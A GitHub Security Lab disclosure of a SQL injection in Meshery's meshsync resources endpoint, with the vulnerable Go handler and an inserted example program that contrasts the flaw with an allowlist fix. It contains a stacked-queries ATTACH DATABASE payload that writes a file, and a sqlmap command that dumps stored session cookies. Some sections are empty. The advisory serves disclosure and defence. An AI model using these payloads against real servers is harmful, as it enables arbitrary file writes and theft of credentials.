March 21, 2024

GHSL-2023-249: SQL injection vulnerability in Meshery - CVE-2024-29031

GitHub Security Lab

Coordinated Disclosure Timeline


A SQL injection vulnerability in Meshery up to v0.6.181 allows a remote attacker to obtain sensitive information via the order parameter of GetMeshSyncResources.



Tested Version



SQL injection in GetMeshSyncResources (GHSL-2023-249)

The Meshery project exposes the function GetMeshSyncResources at the API URL /api/system/meshsync/resources. The order query parameter is taken from the request without validation and used directly to build a SQL query in line 135 of the meshsync_handler.go file, as can be seen in the following snippet:

func (h *Handler) GetMeshSyncResources(rw http.ResponseWriter, r *http.Request, _ *models.Preference, _ *models.User, provider models.Provider) {
	// --snip--
	// Both values come straight from the query string, unvalidated.
	order := r.URL.Query().Get("order")
	sort := r.URL.Query().Get("sort")
	// --snip--

	result := provider.GetGenericPersister().Model(&model.KubernetesResource{}).
		// --snip--

	if order != "" {
		if sort == "desc" {
			// --snip--
		} else {
			// Sink: GORM's Order(string) treats its argument as a raw SQL
			// fragment, so the attacker-controlled value is spliced verbatim
			// into the ORDER BY clause of the generated query.
			result = result.Order(order)
		}
	}
	// --snip--
	err := result.Find(&resources).Error
	// --snip--
}


This issue may lead to arbitrary file write by using a stacked-queries SQL injection payload together with SQLite's ATTACH DATABASE command: ATTACH DATABASE makes SQLite create a new database file at a path of the attacker's choosing, and further statements against that database write attacker-controlled content into it. The write happens with the permissions of the Meshery process, so it is limited to paths that process can create or modify.

Additionally, attackers may be able to read and modify any data stored in the database, such as performance profiles (which may contain session cookies), Meshery application data, or any Kubernetes configuration added to the system.
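The following Go program is an added example, not code from the advisory or from the Meshery project. It places the vulnerable pattern from the snippet above (the attacker-controlled string concatenated into ORDER BY, which is the effect of passing a plain string to GORM's Order) beside a hardened builder that accepts only allowlisted column names and a normalised sort direction, and feeds both a constructed stacked-queries payload of the shape described above (ATTACH DATABASE followed by statements that write into the new file). The column allowlist, the sample URL and the payload text are assumptions made for this example; the payload illustrates the technique and is not the request used in the proof of concept.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Columns a client is allowed to sort on. This allowlist is an assumption
// for the example, not a list taken from Meshery.
var sortableColumns = map[string]bool{
	"id":          true,
	"kind":        true,
	"api_version": true,
	"created_at":  true,
	"updated_at":  true,
}

// vulnerableOrderClause mirrors the effect of result.Order(order) in the
// handler: GORM treats a string passed to Order as a raw SQL fragment, so
// whatever the client sent lands verbatim in the query text.
func vulnerableOrderClause(order string) string {
	return "ORDER BY " + order
}

// safeOrderClause is the hardened form: the column must be one of the
// allowlisted identifiers and the direction is normalised to ASC or DESC.
// Anything else is rejected before it can reach the database.
func safeOrderClause(order, sort string) (string, error) {
	col := strings.ToLower(strings.TrimSpace(order))
	if !sortableColumns[col] {
		return "", fmt.Errorf("order: %q is not a sortable column", order)
	}
	dir := "ASC"
	switch strings.ToLower(strings.TrimSpace(sort)) {
	case "", "asc":
	case "desc":
		dir = "DESC"
	default:
		return "", fmt.Errorf("sort: %q must be asc or desc", sort)
	}
	// Quote the identifier so it can only ever be read as a column name.
	return fmt.Sprintf(`ORDER BY "%s" %s`, col, dir), nil
}

// orderFromQuery pulls order and sort out of a request URL the way the
// handler does (r.URL.Query().Get) and runs them through the hardened builder.
func orderFromQuery(rawURL string) (string, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return "", err
	}
	q := u.Query()
	return safeOrderClause(q.Get("order"), q.Get("sort"))
}

// Constructed payload in the shape the advisory describes: a stacked-queries
// injection in which ATTACH DATABASE makes SQLite create a new file at an
// attacker-chosen path and the following statements write content into it.
// Illustration only; not the advisory's request.
const stackedPayload = "id; ATTACH DATABASE '/tmp/test' AS x; CREATE TABLE x.t (c TEXT); INSERT INTO x.t VALUES ('constructed content'); --"

func main() {
	// Vulnerable path: the whole payload becomes part of the SQL text.
	fmt.Println("vulnerable:", vulnerableOrderClause(stackedPayload))

	// Hardened path: the payload is not an allowlisted column and is refused.
	if _, err := safeOrderClause(stackedPayload, ""); err != nil {
		fmt.Println("hardened rejects payload:", err)
	}

	// Hardened path on a legitimate request (URL constructed for the example).
	clause, err := orderFromQuery("http://localhost:9081/api/system/meshsync/resources?order=created_at&sort=desc")
	if err != nil {
		fmt.Println("unexpected error:", err)
		return
	}
	fmt.Println("hardened accepts:", clause)
}
```

Running the program prints the raw clause the vulnerable path would emit, the rejection produced by the hardened path for the same input, and the quoted clause built for a legitimate request. In the real handler the equivalent fix is to validate order and sort before calling Order, or to pass GORM a clause.OrderByColumn value instead of a string so that the column name is quoted rather than spliced in as raw SQL.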

Arbitrary data read and write may be a problem depending on several factors:

Proof of Concept

To reproduce this issue, the following three requests can be used to write a file at an arbitrary location with arbitrary contents (note that an appropriate cookie needs to be sent with each request; for local authentication use Cookie: meshery-provider=None):


Verify that the test file was created:

cat /tmp/test

Also, arbitrary database entries can be created by issuing a request to the following URL:


To extract information from the database, blind SQL injection techniques must be used. For instance, sqlmap can automate dumping the request cookies stored in a performance profile; --technique S restricts it to stacked queries, and --ignore-code=500 keeps it running despite the HTTP 500 responses the server returns for malformed ORDER BY clauses:

$ sqlmap -u 'http://(victim server):9081/api/system/meshsync/resources?order=1*' --technique S --dbms SQLite --header "Cookie: meshery-provider=None" --drop-set-cookie --ignore-code=500 --batch -T performance_profiles -C request_cookies --dump


Table: performance_profiles
[1 entry]
+---------------------------+
| request_cookies           |
+---------------------------+
| {"Session": "test_value"} |
+---------------------------+



This issue was discovered and reported by GitHub CodeQL team member @atorralba (Tony Torralba). The vulnerability was found with the help of CodeQL’s SQL injection query.


You can contact the GHSL team at ; please include a reference to GHSL-2023-249 in any communication regarding this issue.